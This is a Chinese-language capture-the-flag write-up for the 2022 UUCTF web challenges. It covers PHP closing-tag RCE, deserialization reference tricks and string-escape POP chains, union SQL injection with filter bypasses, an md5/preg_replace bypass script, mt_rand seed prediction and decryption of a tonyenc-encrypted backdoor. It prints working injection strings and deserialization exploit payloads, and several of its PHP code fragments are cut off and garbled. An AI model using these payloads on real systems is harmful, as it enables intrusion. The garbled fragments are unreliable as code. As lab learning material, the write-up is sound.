2022 UUCTF

创始人

2024-04-26 19:57:17

0次

<1> Web

(1) websign(禁用js绕过)

(2) ez_rce(?>闭合 `rce`)

(3) ez_unser(引用传递)

(4) ez_upload(apache后缀解析漏洞)

(5) ezsql(union注入)

(6) funmd5(代码审计 %0a绕过preg_replace)

(7) phonecode(伪随机数漏洞)

(8) ezpop(反序列化字符串逃逸)

(9) backdoor(tonyenc加密&IDA逆向so文件)

(10) uploadandinject(LD_PRELOAD劫持)

<1> Web

(1) websign(禁用js绕过)

禁用了右键与ctrl U 我们提前打开F12 然后再访问，即可看见源码

(2) ez_rce(?>闭合 `rce`)

';eval($code);}else{die("你想干什么？？？？？？？？？");}
}
else{echo "居然都不输入参数，可恶!!!!!!!!!";show_source(__FILE__);
}

没有过滤 <> ? \/ 可以 ?>闭合

?code=?> 得到flag文件名称：fffffffffflagafag

rev和nl没有被过滤利用此读取flag文件

?code=?>

(3) ez_unser(引用传递)

a=1;$this->b=2;$this->c=3;}public function __wakeup(){$this->a='';}public function __destruct(){$this->b=$this->c;eval($this->a);}
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){die("你输入的不正确！！！搞什么！！");
}
$bbb=unserialize($_GET['a']);

反序列化，从正则上看 preg_match('/test":3/i',$a) 即我们传入的序列化数据不能通过修改属性个数来绕过wakeup

这道题和之前ISCTF比赛的猫和老鼠类似，可以用引用地址传递

exp：

a = &$A->b;
$A->c = "system('cat /fffffffffflagafag');";
echo serialize($A);
?>

(4) ez_upload(apache后缀解析漏洞)

(5) ezsql(union注入)

简单union注入，不过是把字符串反向了过滤了or

union注入：

?user=admin&password=%232%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,2#') AND username=('nimda') LIMIT 0,1 得知有两列，回显为1和2

过滤了 or，所以原先是ro的词，双写绕过 rroo

?user=admin&password=%23)(esabatad%3Damehcs_elbat+erehw+selbat.amehcs_noitamrofni+moorrf+)eman_elbat(tacnoc_puoorrg%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#') AND username=('nimda') LIMIT 0,1

得到flag表

查询flag表字段

?user=admin&password=%23'galf'%3Deman_elbat+dna+)(esabatad%3Damehcs_elbat+erehw+snmuloc.amehcs_noitamrofni+moorrf+)eman_nmuloc(tacnoc_puoorrg%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag'#') AND username=('nimda') LIMIT 0,1

得到UUCTF

?user=admin&password=%23galf+moorrf+FTCUU%2C1+tceles+noinu+)'1

即：SELECT * FROM users WHERE passwd=('1') union select 1,UUCTF from flag#') AND username=('nimda') LIMIT 0,1

得到flag

(6) funmd5(代码审计 %0a绕过preg_replace)

 ";echo $flag;}else{echo $md5[0];echo "oh!no!maybe you need learn more PHP!";}}else{echo "this is your md5:$md5[0]
";echo "maybe you need more think think!";}
}
else{highlight_file(__FILE__);$sub=strlen($md5[0]);echo substr($guessmd5,0,5)."
";echo "plase give me the md5!";
}
?>
8b17e

$md5=preg_replace('/^(.)0e(.)$/','${1}no_science_notation!${2}',$md5); if(preg_match('/0e/',$md5[0]))

这两个里的条件是矛盾的，但是我们可以%0a绕过preg_replace函数，同时传入的md5[0]要满足

$md5[0]==md5($md5[0] 很常见的md5考点，弱类型比较 0e215962017 MD5加密后还是0e开头。

因此md5[0]应该传入%0a0e215962017，但是我们又多了一个%0a 换行符，通过上面这行代码 $md5[0]=substr($md5[0],$sub);

可以在 $sub=1的时候，执行会达到删去%0a的作用

而 $sub=substr($time,-1); $sub由$time决定，$sub为$time的最后一位。

要得到flag，要满足的第二个条件为：$md5[1]===$guessmd5 手动比较慢，赶不上时间，因此需要写一个python脚本

如下：

import requests
import time
import hashlib
s = requests.session()while True:url = "http://43.143.7.127:28150/?md5[0]=%0a0e215962017&md5[1]={}".format(hashlib.md5(str(int(time.time())).encode('utf-8')).hexdigest())res = s.get(url=url).textprint(res)if 'well' in res:print(res)breaktime.sleep(0.5)

(7) phonecode(伪随机数漏洞)

结合这句话，可以联想到mt_rand()和mt_srand() 随机数种子，发包得到hint，

phone不同，hint不同

猜测phone为种子，hint为其中的伪随机数序列

phone为1时，hint：895547922 印证了刚才的想法

"; #895547922
echo mt_rand()."
"; #2141438069
echo mt_rand()."
"; #1546885062
echo mt_rand()."
"; #2002651684
?>

我们传入code为下一个随机数试一试得到flag

(8) ezpop(反序列化字符串逃逸)

name=$str;}function __wakeup(){if($this->key==="UUCTF"){$this->ob=unserialize(base64_decode($this->basedata));}else{die("oh!you should learn PHP unserialize String escape!");}}
}
class output{public $a;function __toString(){$this->a->rce();}
}
class nothing{public $a;public $b;public $t;function __wakeup(){$this->a="";}function __destruct(){$this->b=$this->t;die($this->a);}
}
class youwant{public $cmd;function rce(){eval($this->cmd);}
}
$pdata=$_POST["data"];
if(isset($pdata))
{$data=serialize(new UUCTF($pdata));$data_replace=str_replace("hacker","loveuu!",$data);unserialize($data_replace);
}else{highlight_file(__FILE__);
}
?>

data参数可控，然后post会传入data之后，$data会new一个UUCTF类的实例对象，替换掉hacker为loveuu!,再进行反序列化

先正常传入data=jack，则$data应该为：

O:5:"UUCTF":4:{s:4:"name";s:4:"jack";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}

其中标红的是我们可控的参数

开始代码审计，在youwant类我们可以通过rce方法，实现命令执行，以此读flag，

现在找链子：

UUCTF:: nothing::__destruct() -> output::__toString() -> youwant::rce

流程即：我们通过传入的data参数，构造把后面的逃逸掉，构造新的序列化串

O:5:"UUCTF":4:{s:4:"name";s:4:"构造的~~";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}~~

unserialize($data_replace); 这一段代码是为了触发 UUCTF的__wakeup()，我们需要真正利用的是 __wakeup()函数里，满足 $this->key==="UUCTF"条件后，执行的unserialize(base64_decode($this->basedata));

exp如下：

a="";}function __destruct(){$this->b=$this->t;die($this->a);}
}
class youwant{public $cmd="system('cat flag.php');";
}
$A = new nothing();
$A->a = &$A->b;
$A->t = new output();
$A->t->a = new youwant();
$basedata = base64_encode(serialize($A));
$data = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:'.strlen($basedata).':"'.$basedata.'";s:2:"ob";N;}';
$hacker='';
for($i=0;$i

得到：Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19

所以构造的序列化串应为：

O:5:"UUCTF":4:{s:4:"name";s:4:"";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO047czoxOiJiIjtSOjI7czoxOiJ0IjtPOjY6Im91dHB1dCI6MTp7czoxOiJhIjtPOjc6InlvdXdhbnQiOjE6e3M6MzoiY21kIjtzOjIzOiJzeXN0ZW0oJ2NhdCBmbGFnLnBocCcpOyI7fX19";s:2:"ob";N;}~~";s:3:"key";N;s:8:"basedata";N;s:2:"ob";N;}~~

但是我们要满足前面的s:*:"构造的" 长度*为我们构造的串的长度，一个hacker换为loveuu! 可以逃逸出一个字符，红色串总长为 236，因此需要236个hacker

最终查看源码，得到flag

详细有关反序列化逃逸可以参考我前面的文章：buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)_葫芦娃42的博客-CSDN博客_apache ssi 远程命令执行过滤绕过

(9) backdoor(tonyenc加密&IDA逆向so文件)

布里茨贼猛 lol里机器人叫布里茨，联想到robots.txt

看见www.zip，存在备份文件泄露下载下来 backdoor.php 结合文件名称，应该是被加密的后门

还有一个so.so文件看其他师傅wp，此题需要逆向的知识

2022UUCTF-web_yb0os1的博客-CSDN博客_uuctf 2022

IDA 逆向 .so文件

so文件是Linux下向当于Windows下的dll文件，Linux下的程序函数库,即编译好的可以供其他程序使用的代码和数据

发现了 tonyenc_encode加密代码

双击代码里的tonyenc_key 得到 header和key的十六进制数据

百度搜索后得知

tonyenc 是一个简洁、高性能、跨平台的 PHP7 代码加密扩展，可以加密php文件内容，PHP 在运行它们时会自动解密

Github上的地址为：GitHub - lihancong/tonyenc: 高性能、跨平台的 PHP7 代码加密扩展 (A high performance and cross-platform encrypt extension for PHP source code)

贴上yb0os1师傅根据源码写的解密脚本：

import base64
header=[0x66, 0x88, 0xff, 0x4f,0x68, 0x86, 0x00, 0x56,0x11, 0x61, 0x16, 0x18,
]
key=[0x9f, 0x58, 0x54, 0x00,0x58, 0x9f, 0xff, 0x23,0x8e, 0xfe, 0xea, 0xfa,0xa6, 0x35, 0xf3, 0xc6]
def decode(data,len):p =0for i in range(0,len):if (i & 1):p += key[p] + i;p %= 16;t = key[p];data[i] = ~data[i]^t;if data[i] < 0:data[i]=data[i]+256decode = "".join([chr(c) for c in data])return decode
encodefile=open('backdoor.php',"rb")
base64_encodestr=base64.b64encode(encodefile.read())
convert=[c for c in base64.b64decode(base64_encodestr)]
del convert[0:len(header)]
print(str(decode(convert,len(convert))))

解密得到backdoor.php文件内容为

(10) uploadandinject(LD_PRELOAD劫持)

下面准备开一章 LD_PRELOAD，仔细研究一下，这道题就写下一篇里吧

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇：C/C++ Qt 标准Dialog对话框组件应用

下一篇：VUE3-创建项目《一》

2022 UUCTF

<1> Web

(1) websign(禁用js绕过)

(2) ez_rce(?>闭合 `rce`)

(3) ez_unser(引用传递)

(4) ez_upload(apache后缀解析漏洞)

(5) ezsql(union注入)

(6) funmd5(代码审计 %0a绕过preg_replace)

(7) phonecode(伪随机数漏洞)

(8) ezpop(反序列化字符串逃逸)

(9) backdoor(tonyenc加密&IDA逆向so文件)

(10) uploadandinject(LD_PRELOAD劫持)

相关内容

热门资讯